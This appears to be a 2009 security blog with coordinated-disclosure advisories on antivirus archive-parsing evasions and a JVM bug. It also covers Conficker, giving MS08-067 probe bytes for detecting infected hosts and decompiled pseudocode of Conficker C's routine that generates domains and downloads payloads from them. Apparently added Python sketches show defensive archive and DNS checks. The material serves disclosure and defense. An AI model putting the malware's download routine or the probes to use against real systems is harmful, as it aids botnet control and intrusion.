This just came in: you can scan a network to detect Conficker infections because of the way Conficker patched the vulnerability.




First and foremost, there is no reason to panic. Conficker will start on April 1st to scan for C&C servers and try to download content. Nothing more, nothing less. There may be content on the servers, but not necessarily. It might be that content is pushed on the 14th of April, or the 30th of June; nobody other than the Conficker authors knows. What is important, however, is to get rid of your infected machines before this happens.

Network Scanners

Information about conficker.c

Disinfection


Vulnerability Details
How is scanning for infected hosts possible?
  • Conficker infects a host through an old vulnerability (MS08-067) that is exposed over MSRPC (NetpwPathCanonicalize function)
  • Conficker patches the vulnerability in memory so nobody else (including itself) can exploit it
  • The in-memory patch is different from the official one from Microsoft and exhibits a different response to a specific query.
Details:
  • Request server = 'a' * 1 + '\0\0\0' + path = '\x5c\0\x2e\0\x2e\0\x5c\0\0\0\0\0'
  • Answer if infected: Result Par#1 = 0x5c450000 and Result Par#3 = 0x00000057
What domains are generated each day ?
  • Uni Bonn has reverse engineered the PRNG for the variants A, B, C
  • Tool and source code can be downloaded here
Have questions related to Conficker? Conficker workgroup


Release mode: Coordinated but limited disclosure.
Ref         : TZO-182009 - Mcafee multiple generic evasions
Vendor      : http://www.mcafee.com      
Status      : Patched
CVE         : CVE-2009-1348 (provided by mcafee)
https://kc.mcafee.com/corporate/index?page=content&id=SB10001&actp=LIST_RECENT

Security notification reaction rating : very good
Notification to patch window : +-27 days (Easter holidays in between)

Disclosure Policy :  http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html

Affected products :

  • McAfee VirusScan® Plus 2009
  • McAfee Total Protection™ 2009
  • McAfee Internet Security
  • McAfee VirusScan USB
  • McAfee VirusScan Enterprise
  • McAfee VirusScan Enterprise Linux
  • McAfee VirusScan Enterprise for SAP
  • McAfee VirusScan Enterprise for Storage
  • McAfee VirusScan Commandline
  • McAfee SecurityShield for Microsoft ISA Server
  • McAfee Security for Microsoft Sharepoint
  • McAfee Security for Email Servers
  • McAfee Email Gateway
  • McAfee Total Protection for Endpoint
  • McAfee Active Virus Defense
  • McAfee Active VirusScan

It is unknown whether SaaS were affected (though likely) :
  • McAfee Email Security Service
  • McAfee Total Protection Service Advanced

I. Background
Quote: "McAfee proactively secures systems and networks from known and as yet undiscovered threats worldwide. Home users, businesses, service providers, government agencies, and our partners all trust our unmatched security expertise and have confidence in our comprehensive and proven solutions to effectively block attacks and prevent disruptions."

II. Description
The parsing engine can be bypassed by a specially crafted and formatted RAR (Headflags and Packsize), ZIP (Filelength) archive.

III. Impact
A general description of the impact and nature of AV Bypasses/evasions can be read at :
http://blog.zoller.lu/2009/04/case-for-av-bypassesevasions.html

The bug results in denying the engine the possibility to inspect code within RAR and ZIP archives. There is no inspection of the content at all and hence the impossibility to detect malicious code.


IV. Disclosure timeline
DD/MM/YYYY
  • 04/04/2009 : Send proof of concept RAR I, description, the terms under which I cooperate and the planned disclosure date
  • 06/04/2009 : Send proof of concept RAR II, description, the terms under which I cooperate and the planned disclosure date
  • 06/04/2009 : McAfee acknowledges receipt and reproduction of RAR I, acknowledges receipt of RAR II
  • 10/04/2009 : Send proof of concept ZIP I, description, the terms under which I cooperate and the planned disclosure date
  • 21/04/2009 : McAfee provides CVE number CVE-2009-1348
  • 28/04/2009 : McAfee informs me that the patch might be released on the 29th
  • 29/04/2009 : McAfee confirms patch release and provides URL
    https://kc.mcafee.com/corporate/index?page=content&id=SB10001&actp=LIST_RECENT
  • 29/04/2009 : Ask for affected versions
  • 29/04/2009 : McAfee replies "This issue does affect all vs engine products, including both gateway and endpoint"

Update 08.05.2009 - CHANGES to original advisory [TZO-172009] Trendmicro :

Status : RAR / CAB issue WILL be patched on June 17

Quoting vendor :
"This vulnerability is capable of allowing attackers to send RAR / CAB with corrupted RAR headers through our gateway products, which bypass the compressed files without scanning them."


Comment:
This just goes to prove that publishing changes perception, as customers read, react and complain. (Trend previously denied patching). In other words, always publish even if the vendor denies patching.

In the name of all TrendMicro customers I would like to thank those customers that reacted and complained. Without publication there is no change, without those reacting to advisories there is neither.

Proves #2 and #5 at http://blog.zoller.lu/2009/04/dear-thierry-why-are-you-such-arrogant.html to be valid.





Release mode: Coordinated but limited disclosure.
Ref : TZO-172009 - Trendmicro RAR,CAB,ZIP bypass/evasion
Status : No patch, but mitigation recommendations for certain products (see below)
BID: http://www.securityfocus.com/bid/34763/references
Vendor : http://www.trendmicro.com/
Security notification reaction rating : Good
Notification to patch time window : n+1 days (no patch)


Disclosure Policy :
http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html

Affected products :

  • Client-side products
    These will not be patched; Trend's reason is that malware will be detected upon extraction. While this is true for end-user setups, this is not the case if you use such products to scan file servers, database servers or any server where an end user does not actively extract content. The detection is still completely bypassed. In other words, you can no longer assume that a RAR, ZIP, CAB (or any other archive) is safe/clean after a Trendmicro scan with these products. Hence I can no longer recommend these products for such uses, and hence my recommendation to Trend to offer patches; if you use the products in such an environment, please contact Trend and ask for a patch.

    I applaud Trend however for the time and effort spent with communicating with me and the transparency presented.

    Client-side Impact : Low for usage in End-user scenarios
    Client-side Impact : High for usage in fileserver, database scenarios.

  1. OfficeScan product suites (All of OfficeScan products)
  2. ServerProtect product suite (All products of Server protect)
    -ServerProtect for Microsoft Windows/Novell NetWare
    -ServerProtect for EMC Celerra
    -ServerProtect for NetApp
    -Server Protect for Linux
    -ServerProtect for Network Appliance Filers
  3. Trend Micro Internet Security product suites(Internet Security Pro, Internet Security, Antivirus+AntiSpyware)
  4. Client / Server / Messaging Suite ( The OfficeScan component )
  5. Worry Free Business Security - Standard
  6. Worry Free Business Security - Advanced ( The security agent component )
  7. Worry Free Business Security Hosted
  8. Housecall
  • Gateway products
  1. InterScan Web Security Suite product lines and InterScan Web Protect for ISA
    Impact: Detection is evaded but files are quarantined by default, residual risk of an administrator deblocking a file as there is no detection of malicious code.
  2. InterScan Messaging Security Appliance
    Impact: Detection is evaded but files are quarantined by default, residual risk of an administrator deblocking a file as there is no detection of malicious code.
  3. Neatsuite Advanced (combination of InterScan Messaging Security Suite, InterScan Web Security Suite, ScanMail Suite for Domino or Exchange, and All)
    Please see, specific product recommendation
  4. ScanMail for Exchange
    Impact: Protection is bypassed by default
    After mitigation: Residual risk of an administrator deblocking a file as there is no detection of malicious code.

    Mitigation recommendations from Trend:
    1. Set the "Virus Scan > Action > Files outside of scan restriction Criteria" to any of the secured options. Quarantined entire message and set to Notify
    2. The file will be blocked and the Administrator will receive the email notification.

  5. ScanMail for Domino Suites
    Impact: Protection is bypassed by default, detection is also bypassed after mitigation but file is quarantined as "non extractable". After mitigation: Residual risk of an administrator deblocking a file as there is no detection of malicious code.

    Mitigation recommendations from Trend:
    1. Open the ScanMail for Domino Configuration database
    2. Go to Configurations > Policies
    3. Double click on Default Mail Scan
    4. Click on Scan Options Tab > Scan Restrictions
    5. Put a mark on Exceed extracted file size and set this to either of the much secured action
       a. Quarantine
       b. Delete
    6. Put any of the preferred value to maximum extracted file size
    7. Click on Save & Closed



I. Background
Quote: "Trend Micro Incorporated is a global leader in network antivirus and Internet content security software and services. Founded in 1988, Trend Micro was a pioneer in secure content and threat management, leading the migration of early virus protection from the desktop to the network server and the Internet gateway. Today, the company continues to advance its comprehensive approach to management of content security threats into the Internet cloud, encompassing information flow beyond the boundaries of the network. With its 24x7 global support operations and dedication to innovative technologies and methodologies, Trend Micro is well positioned to protect its customers against an expanding range of threats that silently endanger business operations, personal information, and property."


II. Description

The parsing engine can be bypassed by a specially crafted and formatted ZIP, RAR, CAB archive. Details are currently withheld due to other vendors that are in process of actually deploying patches.

III. Impact
A general description of the impact and nature of AV Bypasses/evasions can be read at :
http://blog.zoller.lu/2009/04/case-for-av-bypassesevasions.html

The bug results in denying the engine the possibility to inspect code within the CAB archive. There is no inspection of the content at all.

Trendmicro decided not to patch the evasion bugs and proposed mitigation recommendations; the reason given is that doing so would somehow increase the risk of "buffer overflow and BSOD". I am positive that adding more code and increasing detection rates is probably going to increase your chances of having such flaws, but then again, the goal is to catch as much malware as possible.

This is fine with me as long as customers know exactly what risk they run or don't run when following such recommendations, and why other AV vendors simply reduce the amount of trusted input to a minimum, i.e. (only parse and interpret the bare minimum required to extract the content of an archive), instead of giving up. In my point of view the goal of an anti-virus program is to detect as much malware as possible.


IV. Disclosure timeline
  • 14/03/2009 : Send proof of concept, description, the terms under which I cooperate and the planned disclosure date
    No reply

  • 16/03/2009 : Resent
    No reply

  • 09/04/2009 : Resending, specifying this is the last attempt at responsible disclosure.
    No reply

  • 13/04/2009 : Resending, specifying this is the last attempt at responsible disclosure (sic)

  • 13/04/2009 : Trend replies and acknowledges receipt of previous reports.

  • 14/04/2009 : Trend replies that "1. Scan Engine found that modified packed size is greater than archive size during scanning corrupted RAR. 2. Scan Engine didn't force to decompress corrupted archive because to decompress invalid archive could incur unexpected result, for example, buffer overflow and BSOD. [..] 4. The risk of decompressing invalid archive is much high than gateway products pass it when get error code -82 (BAD_ZIP_ERR)" and "virus leak should still not occur because once you decompress the archive, Real-Time scan will still detect the malware once it's extracted out of the corrupted archive." "One concern that we see from this point is that Gateway products won't be able to extract the archive during its scanning phase. (You will have to manually extract the file for IMSx or IWSx to detect the malware).However, as stated earlier we cannot force the extraction of corrupted archives because of other potential issues that could occur. So a workaround would be to configure your gateway solution to or block files wherein the scan result is "uncertain" or when the scan engine returns a specific error code (in this case -82)."

  • 14/04/2009 : Ask Trend to reconsider its position, assuming the files bypass the gateway appliances.
  • 14/04/2009 : Trend replies with more details clarifying that gateways are configured to quarantine such files per default.

  • 14/04/2009 : Ask for clarifications as to product ranges and default configurations
  • 14/04/2009 : Trend confirms that the "Gateway InterScan Messaging 7.0" products are configured to quarantine these by default and are investigating on the other default configurations. "On Trend Micro desktop products, upon testing with the rar and the cab that you had submitted, the archives will not trigger the scanning component. However once the files are extracted by winrar, winzip or any other archiving software they will be detected by the Trend Micro product before the malicious file can execute."

  • 15/04/2009 : Trendmicro comes back with a detailed list of gateway products and default configurations. Trend recommends 2 mitigation configurations for Scanmail product ranges
  • 16/04/2009 : Point out that one of these mitigation configurations opens the gateway to DoS attacks (allow x times the size of compression archive) and ask for a list of affected products.

  • 23/04/2009 : Trend changes the mitigation recommendation for one of the scanmail products

[..] Taking a short cut in the timeline.

  • 29/04/2009 : Release of this advisory
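
The gateway workaround quoted in the timeline (block when the scan result is "uncertain") and the extraction-size concern raised on 16/04, sketched as an added example that is not code from this advisory or from any vendor. ZIP stands in for the archive formats because Python's standard library parses it; `toy_scan`, the test signature and the 256 KiB cap are assumptions, and all sample archives are constructed inline.

```python
import io
import zipfile
import zlib

# Constructed stand-in for a signature match; not a real malware pattern.
TEST_SIGNATURE = b"CONSTRUCTED-TEST-SIGNATURE"
# Assumed cap on the total number of bytes extracted from one archive.
MAX_UNPACKED_BYTES = 256 * 1024

# Everything the ZIP parser can raise on damaged or unsupported input.
PARSE_ERRORS = (zipfile.BadZipFile, zlib.error, EOFError,
                NotImplementedError, RuntimeError, OSError, ValueError)


def toy_scan(data):
    """Hypothetical content scanner: True when the test signature is present."""
    return TEST_SIGNATURE in data


def gateway_verdict(blob, fail_closed=True, max_unpacked=MAX_UNPACKED_BYTES):
    """Return 'clean', 'infected' or 'quarantine' for a ZIP attachment.

    fail_closed=False models the weak setting: an archive the engine cannot
    parse is passed on although nothing inside it was inspected.
    fail_closed=True models the mitigation: an "uncertain" result is blocked.
    """
    budget = max_unpacked
    try:
        with zipfile.ZipFile(io.BytesIO(blob)) as archive:
            for info in archive.infolist():
                if info.is_dir():
                    continue
                with archive.open(info) as member:
                    # Read one byte more than the budget so that an oversized
                    # member is noticed without decompressing all of it.
                    data = member.read(budget + 1)
                if len(data) > budget:
                    return "quarantine"   # extraction cap exceeded
                budget -= len(data)
                if toy_scan(data):
                    return "infected"
    except PARSE_ERRORS:
        # Nothing (or only part) of the archive was inspected.
        return "quarantine" if fail_closed else "clean"
    return "clean"


def make_zip(members):
    """Build an in-memory ZIP from {name: bytes} (constructed sample data)."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w", zipfile.ZIP_DEFLATED) as archive:
        for name, data in members.items():
            archive.writestr(name, data)
    return buffer.getvalue()


# Constructed samples.
CLEAN = make_zip({"readme.txt": b"hello"})
FLAGGED = make_zip({"sample.bin": b"header " + TEST_SIGNATURE})
DAMAGED = FLAGGED[:-10]                      # end-of-archive record cut off
OVERSIZE = make_zip({"zeros.bin": bytes(1024 * 1024)})

if __name__ == "__main__":
    for label, blob in (("clean", CLEAN), ("flagged", FLAGGED),
                        ("damaged", DAMAGED), ("oversize", OVERSIZE)):
        print(label, gateway_verdict(blob, fail_closed=False),
              gateway_verdict(blob, fail_closed=True))
```

With `fail_closed=False` the damaged sample comes back as "clean" although its content was never inspected, which is the residual risk the advisory describes; the size cap keeps the fail-closed path from turning into a decompression DoS.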

Release mode: Coordinated but limited disclosure.
Ref         : TZO-162009 - Nod32 CAB bypass/evasion
Status      : Patched since Monday 27th (update #4036)
Vendor      : http://www.eset.com/      
Security notification reaction rating : Good
Notification to patch time window : 14 days

Disclosure Policy :
http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html

Affected products :

  • ESET Smart Security 4 (update #4036)
  • ESET NOD32 Antivirus 4 (update #4036)
  • ESET Smart Security 4 Business Edition (update #4036)
  • ESET NOD32 Antivirus 4 Business Edition (update #4036)
  • ESET NOD32 Antivirus for Exchange Server (update #4036)
  • ESET Mail Security  (update #4036)
  • ESET NOD32 Antivirus for Lotus Domino Server (update #4036)
  • ESET File Security (update #4036)
  • ESET Novell Netware (update #4036)
  • ESET DELL STORAGE SERVERS (update #4036)
  • ESET NOD32 Antivirus for Linux gateway devices (update #4036)

I. Background
ESET develops software solutions that deliver instant, comprehensive protection against evolving computer security threats. ESET NOD32® Antivirus, is the flagship product, consistently achieves the highest accolades in all types of  comparative testing and is the foundational product that builds  out the ESET product line to include ESET Smart Security.

http://www.eset.com/products/eset_performance_advantages.php

II. Description
The parsing engine can be bypassed by a specially crafted and formatted CAB archive. Details are currently withheld due to other vendors that are in process of deploying patches.

III. Impact
A general description of the impact and nature of AV Bypasses/evasions can be read at :
http://blog.zoller.lu/2009/04/case-for-av-bypassesevasions.html

The bug results in denying the engine the possibility to inspect code within the CAB archive. There is no inspection of the content at all.


IV. Disclosure timeline

  • 13/04/2009 : Send proof of concept, description, the terms under which I cooperate and the planned disclosure date
    No reply
  • 17/04/2009 : Resend notification with an indication this will be the last attempt to responsibly disclose.
  • 17/04/2009 : Eset acknowledges receipt and previous receipt
  • 29/04/2009 : Eset informs me that the bug was fixed on the 27th of April through an automatic update (update #4036)
  • 29/04/2009 : Release of this advisory


Update: The information displayed on Aladdin blog post is erroneous, the end-user is able to extract the file. Still working with Aladdin on the issue



Release mode: Forced release, vendor has not replied.

Ref : TZO-152009 - Aladdin eSafe Generic Evasion
Status : Not patched
Vendor : http://www.aladdin.com
Security notification reaction rating : Catastrophic
(vendor visited specific url at my website but has not reacted)

Disclosure Policy :
http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html

Affected products :
- t.b.a (Vendor has not reacted, please see below)
- probably all versions including gateway solutions

As this bug has not been reproduced by the vendor, this limited advisory relies on the assumption that my tests were conclusive and that the test environment mimics the production environment.

I. Background
Quote: "Aladdin is dedicated to being the leading provider of security services and solutions used to protect digital assets, enable secure business, and maximize the benefits from creating, selling, distributing and using digital content."


II. Description
The parsing engine can be bypassed by a specially crafted and formatted archive file. Details are currently withheld due to other vendors that are in process of deploying patches.

A professional reaction to a vulnerability notification is a way to measure the maturity of a vendor in terms of security. Aladdin is given a grace period of two (2) weeks to reply to my notification. Failure to do so will result in POC being released in two (2) weeks.

Aladdin is advised to leave a specific security contact at [1] in order to simplify getting in contact with them.

As this bug has not been reproduced by the vendor, this limited advisory relies on the assumption that my tests were conclusive.

III. Impact
A general description of the impact and nature of AV Bypasses/evasions can be read at : http://blog.zoller.lu/2009/04/case-for-av-bypassesevasions.html

The bug results in denying the engine the possibility to inspect code within the archive. There is no inspection of the content at all.


IV. Disclosure timeline
DD/MM/YYYY
  • 04/04/2009 : Send proof of concept, description, the terms under which I cooperate and the planned disclosure date. There is no security address listed at [1] and hence I took previously known security contacts that are known to exist.
    No reply.

  • 13/04/2009 : Resending. Copied security@aladdin.de, security@aladdin.com, secure@aladdin.com, secure@aladdin.de, support@aladdin.com, support@aladdin.de in CC.
    No reply.

  • 16/04/2009 : Resending, specifying this is the last attempt to disclose responsibly.
    No reply.

  • 18/04/2009 : Online virus scan service offered to bridge the gap between AV vendors that don't reply and myself. Aladdin was contacted through this third party.
No reaction

No reaction
  • 27/04/2009 : Release of this limited advisory and begin of grace period.

  • 27/04/2009 : Aladdin got in contact and are already working on the issue


[1] http://osvdb.org/vendor/1/Aladdin%20Knowledge%20Systems

Release mode: Coordinated but limited disclosure.
Ref : TZO-142009 - Comodo evasion RAR
Vendor : http://www.comodo.com
Status : Patched
Security notification reaction rating : Good
Notification to patch window : 41 days

Disclosure Policy : http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html

Affected products :

  • Comodo Internet Security 3.5.x and 3.8.x (Impact low due to on access scan)
  • Comodo Anti-Virus (Impact low due to on access scan)
I. Background
Quote: "Comodo's range of solutions gives businesses the ability to create online trust through proprietary technology that help e-businesses convert more customers, retain more customers and increase lifetime value."

II. Description
The parsing engine can be bypassed by a specially crafted and formatted RAR archive. Details are currently withheld due to other vendors that are in process of deploying patches.

III. Impact
A general description of the impact and nature of AV Bypasses/evasions can be read at :
http://blog.zoller.lu/2009/04/case-for-av-bypassesevasions.html

The bug results in denying the engine the possibility to inspect code within the RAR archive. There is no inspection of the content at all and hence the impossibility to detect malicious code.


IV. Disclosure timeline
DD/MM/YYYY
  • 14/03/2009 : Send proof of concept, description, the terms under which I cooperate and the planned disclosure date
    No reply

  • 16/03/2009 : Resend notification

  • 23/03/2009 : Comodo answers that the bug has been fixed and will be deployed in version 3.9, due at the end of April.

  • 02/04/2009 : Ask for affected versions.

  • 02/04/2009 : Comodo answers that the ranges 3.5.x and 3.8.x have been affected and that the scheduled release date is the 25th of April. Credit will be given in the release notes.

  • 27/04/2009 : Notify Comodo that I plan to release the advisory today and assume the production code has been released on 25.04.2009

  • 27/04/2009 : Release of this advisory

Release mode: Coordinated but limited disclosure.
Ref : TZO-132009 - Avira Antivir evasion ZIP
Vendor : http://www.avira.com
Status : Patched
Security notification reaction rating : Good
Notification to patch window : 7 days (Easter holidays in between)

Disclosure Policy :
http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html

Affected products :
  • Avira AntiVir Free (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
  • Avira AntiVir Premium (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
  • Avira AntiVir Premium Security Suite (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
  • Avira AntiVir Professional (Desktop) (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
  • Avira AntiVir Server (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
  • Avira AntiVir Exchange (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
  • Avira AntiVir SharePoint (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
  • Avira AntiVir ISA Server (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
  • Avira AntiVir MIMEsweeper (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
  • Avira AntiVir for KEN! 4 (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
  • Avira AntiVir Virus Scan Adapter for SAP NetWeaver®
  • Avira AntiVir Professional (Unix) (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
  • Avira AntiVir Server (Unix) (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
  • Avira AntiVir MailGate (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)
  • Avira AntiVir WebGate (pre AV7 7.9.0.148 / AV8/9: 8.2.0.148)

I. Background

Quote: "Avira AntiVir is a reliable free antivirus solution, that constantly and rapidly scans your computer for malicious programs such as viruses, Trojans, backdoor programs, hoaxes, worms, dialers etc. Monitors every action executed by the user or the operating system and reacts promptly when a malicious program is detected.

The protection experts have numerous company locations throughout Germany and cultivate partnerships in Europe, Asia and America. Avira has more than 180 employees at their main office in Tettnang near Lake Constance and is one of the largest employers in the region. There are around 250 people employed worldwide whose commitment is continually being confirmed by awards. A significant contribution to protection is the Avira AntiVir Personal which is being used by private users a million times over.

AV-Comparatives e.V. have chosen Avira AntiVir Premium as the best anti-virus solution of 2008"


II. Description
The parsing engine can be bypassed by a specially crafted and formatted CAB archive. Details are currently withheld due to other vendors that are in process of deploying patches.

III. Impact
A general description of the impact and nature of AV Bypasses/evasions can be read at :
http://blog.zoller.lu/2009/04/case-for-av-bypassesevasions.html

The bug results in denying the engine the possibility to inspect code within the CAB archive. There is no inspection of the content at all and hence the impossibility to detect malicious code.

IV. Disclosure timeline
DD/MM/YYYY
  • 10/04/2009 : Send proof of concept, description, the terms under which I cooperate and the planned disclosure date

  • 10/04/2009 : Avira acknowledges receipt and informs me of the Easter holidays in Germany.

  • 16/04/2009 : Asked for update

  • 17/04/2009 : Avira replies the problem is fixed in "AVPack >= 8.1.3.14 7.6.1.19"; changes have been made to the SDK in order to allow 3rd party AV vendors that use the engine to receive more details about the file.

  • 18/04/2009 : Avira informs me that the patch is in production since the 17th of April. AV7 7.9.0.148 / AV8/9: 8.2.0.148

  • 18/04/2009 : Ask for more details about the impact on gateway appliances

  • 23/04/2009 : Avira states that the archive effectively evades the default configuration of Avira AntiVir MailGate and Avira AntiVir WebGate (prior to patch). Future evasions can be blocked by setting "BlockSuspiciousArchive" to yes; however, this is not enabled by default.

  • 27/04/2009 : Release of this advisory

In cryptography a simple but important rule applies: only open, documented and peer-reviewed encryption schemes shall be used. The reason is simple: it is very hard to develop a new algorithm that is resistant against attacks; developing a new custom algorithm and keeping it undisclosed is a clear sign the vendor/author has not understood the basic principles of cryptography.

In other words: don't use custom (i.e. "we developed our own algorithm") ciphers. Never. A cryptographic algorithm that relies on obscurity and secrecy about the algorithm itself doesn't add to its security, it diminishes it considerably. The only parties that have a genuine interest in these are three-letter agencies.

The MIFARE fiasco proves this simple principle one more time, add LM, Bluetooth and DECT to the list. Maybe. Maybe?

The authors of the paper linked below do not believe in coincidence, particularly the way certain MIFARE cards were set-up, their weaknesses might have been introduced entirely on purpose. (Read: Backdoor)

The paper "The Dark side of security by Obscurity" goes into more detail about the mifare fiasco : http://www.want2pay.com/mifarebug.pdf (via FEFE)

USB Write Blocker is a small tool I created yesterday; it sets the registry keys to block write requests to USB devices. It comes in useful in several cases; in my case an unnamed AV software insisted on deleting my fuzz samples. Requires .NET 2.0 Framework.

Download USB Write Blocker













The respective registry key and value is :
Rootkey : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
Subkey : StorageDevicePolicies
Key : Writeprotect (Boolean)


Release mode: Coordinated.
Ref : TZO-122009- SUN Java remote code execution
Vendor : http://www.sun.com

Disclosure Policy :
http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html


Affected Products:
- JVM Version 6 Update 1
- JVM Version 6 Update 2

I. Background
Dictionary.com : "The Java Virtual Machine (JVM) is software that converts the Java intermediate language (bytecode) into machine language and executes it. The original JVM came from the JavaSoft division of Sun. Subsequently, other vendors developed their own; for example, the Microsoft Virtual Machine is Microsoft's Java interpreter. A JVM is incorporated into a Web browser in order to execute Java applets. A JVM is also installed in a Web server to execute server-side Java programs. A JVM can also be installed in a client machine to run stand-alone Java applications."

II. Description
Please understand that no details will be given, too many bad guys would use it for drive-by attacks. At this point in time (old + fixed) there is really no need to.


III. Impact
Memory corruption due to a write attempt to a user-controllable offset, i.e. exploitable. The Java VM is reachable through every major browser.


IV. Disclosure timeline

  • 19/11/2008 : Send proof of concept, description to Microsoft (sic), as bug was triggered through IE.
  • 20/11/2008 : Microsoft asks for clarification
  • 21/11/2008 : Clarification sent.
  • 12/12/2008 : Microsoft replicated the memory corruption in Version 6 update 1 and recommends getting in contact with SUN

  • 12/12/2008 : Send proof of concept and description to SUN

  • 16/12/2008 : Sun acknowledges receipt. PGP keys are exchanged.

  • 13/01/2009 : Asked for update from SUN

  • 17/01/2009 : Asked for update and indicate this is the last request prior to release if no answer is given.

  • 12/03/2009 : SUN asks for more specific details

  • 12/03/2009 : Details given

  • 24/04/2009 : Notify SUN that I am drafting the advisory and would require feedback and details

  • 24/04/2009 : SUN asks for a copy of the advisory and explains the engineering team is still working on the case

  • 07/04/2009 : Asks SUN for an update

  • 08/04/2009 : Sun responds that the team is still working on the case

  • 20/04/2009 : Asking for an update and details

  • 20/04/2009 : SUN responds that the engineers could not reproduce in Update 11 and 12

  • 20/04/2009 : I test the new updates and can no longer reproduce the issue

  • 22/04/2009 : Release of this advisory

For those not in the know: Conficker is one of the largest worm botnets in existence, and Conficker is the name attributed to the piece of malware used to create the botnet.

Conficker C uses a PRNG to generate a list of possible rendezvous points; in essence these are domain names (hosts) that have additional information and code to download. After the "fiasco" of having all their pseudo-randomly generated domain names registered or blocked, the new Conficker C variant improved upon its design. Conficker C now generates 50,000 possible combinations per day and adds the resulting string to 110 TLDs.

Update : Conficker disinfection, network scanners and more

Interestingly, among the possible TLDs is also the Luxembourg (LU) domain. It will be interesting to see if it will be used and how Restena (the main registrar) will react. My guess is that they will most likely not succeed in getting their LU domain, since the back-end process is entirely manual (afaik).


So if somebody from Restena is reading this post: if you get a request to register a random domain name like yxsdsdfsfd.lu, you should react by informing your 2nd tier registrar that something might be fishy (appropriate noun in this case) and manually verify a contact name and phone number prior to handing out the domain.
PS: Having not seen the PRNG, it might be totally possible that a more meaningful domain than random characters might be generated once in a while.


More Information : Excellent technical background about Conficker C from SRI

The code used to generate the domain names is :


int domain_name_generation()
{
    // local declarations
    hMem = 0;
    check_if_MS_DEF_PROV();
    get_time_from_popular_web_sites();
    // baidu.com, google.com, yahoo.com, ask.com, w3.org,
    // facebook.com, imageshack.us, rapidshare.com

    hMem = GlobalAlloc(0x40u, 0x30D40u); // global array - 50,000 random names
    if ( hMem )
    {
        while ( 1 )
        {
            counter_domains = counter;
            if ( counter >= 50000 )
                break;

            size_of_name = DGA_random_function() % 6 + 4;
            // size of domain name is between 4 and 10 chars

            // append "." at the end of the name
            random = DGA_random_function();
            strcat(*end_of_random_name, (&array_top_domains)[4 * random % 116]);
            // append to the name one of the 116 top domain names
            ++counter;
        }

        // select and query 500 domains
        counter_domains = 0;
        while ( !success_download && counter_domains < 500 )
        {
            // random number modulo 50,000
            one_in_50000_names =
                conficker_D_PRNG_function() % 50000;
            hostent = gethostbyname(one_in_50000_names);
            // resolve name to a set of IP addresses
            if ( hostent )
            {
                host_address = hostent->address_list; // get list of IPs
                array_previously_checked_IPs[counter_domains] = host_address;

                if ( *host_address )
                {
                    // skip if domain name resolves to multiple IP addresses
                    if ( !*(host_address + 1) )
                    {
                        // skip if IP is local host or other trivial IPs
                        if ( check_IP_value(host_address) )
                        {
                            is_blacklisted_ip =
                                check_if_IP_is_in_ranges(host_address);
                            // skip if IP is blacklisted
                            if ( ! is_blacklisted_ip )
                            {
                                found = 0;
                                index = 0;
                                while (index < counter_domains )
                                {
                                    if (host_address == array_previously_checked_IPs[index] )
                                    {
                                        found = 1;
                                        break; // break if IP has been previously encountered
                                    }
                                    ++index;
                                }
                                // skip if IP has been previously encountered
                                if ( !found )
                                {
                                    snprintf(Dest, 0x80u, "http://%s", host_address);
                                    success_download = download_and_validate_file(Dest);
                                    // HTTP request to the domain and download valid file
                                }
                            }
                        }
                    }
                }
            }
            Sleep(...); // sleep small random amount
            ++counter_domains;
        }
    }
    GlobalFree(hMem);
    return success_download;
}
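Seen from the defender's side, the routine above leaves a recognisable trace in resolver logs: one client asking for many short random labels spread over many TLDs, most of which do not resolve. The following heuristic is an added example, not part of the original post or of SRI's analysis; the log tuple format, the letters-only label pattern and all thresholds are assumptions, and the log rows are constructed.

```python
import random
import re
import string
from collections import defaultdict

# Shape from the routine above: one 4-10 character label plus one TLD.
LABEL = re.compile(r"^[a-z]{4,10}$")  # assumption: lowercase letters only
MIN_NAMES = 20       # assumed threshold: distinct candidate names per client
MIN_TLDS = 5         # assumed threshold: distinct TLDs among those names
MIN_NX_RATIO = 0.8   # assumed: most generated names are not registered


def constructed_log():
    """Constructed (client, qname, rcode) rows; not real traffic, not Conficker's PRNG."""
    rng = random.Random(7)
    tlds = ["lu", "com", "net", "org", "info", "biz", "ws", "cn"]
    rows = []
    for i in range(40):  # 10.0.0.5 resolves many random names
        label = "".join(rng.choice(string.ascii_lowercase)
                        for _ in range(rng.randint(4, 10)))
        rcode = "NOERROR" if i % 10 == 0 else "NXDOMAIN"
        rows.append(("10.0.0.5", f"{label}.{tlds[i % len(tlds)]}", rcode))
    for name in ["google.com", "www.example.org", "yahoo.com"] * 5:
        rows.append(("10.0.0.9", name, "NOERROR"))  # ordinary client
    return rows


def suspicious_clients(rows):
    """Return {client: (distinct names, distinct TLDs, NXDOMAIN ratio)} over thresholds."""
    seen = defaultdict(dict)  # client -> {name: last rcode}
    for client, qname, rcode in rows:
        parts = qname.lower().rstrip(".").split(".")
        if len(parts) == 2 and LABEL.match(parts[0]):
            seen[client][".".join(parts)] = rcode
    flagged = {}
    for client, names in seen.items():
        tlds = {name.rsplit(".", 1)[1] for name in names}
        nx = sum(r == "NXDOMAIN" for r in names.values()) / len(names)
        if len(names) >= MIN_NAMES and len(tlds) >= MIN_TLDS and nx >= MIN_NX_RATIO:
            flagged[client] = (len(names), len(tlds), round(nx, 2))
    return flagged


if __name__ == "__main__":
    print(suspicious_clients(constructed_log()))
```

Names under multi-label public suffixes are skipped by the two-label check, so a production rule would need a public-suffix list.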

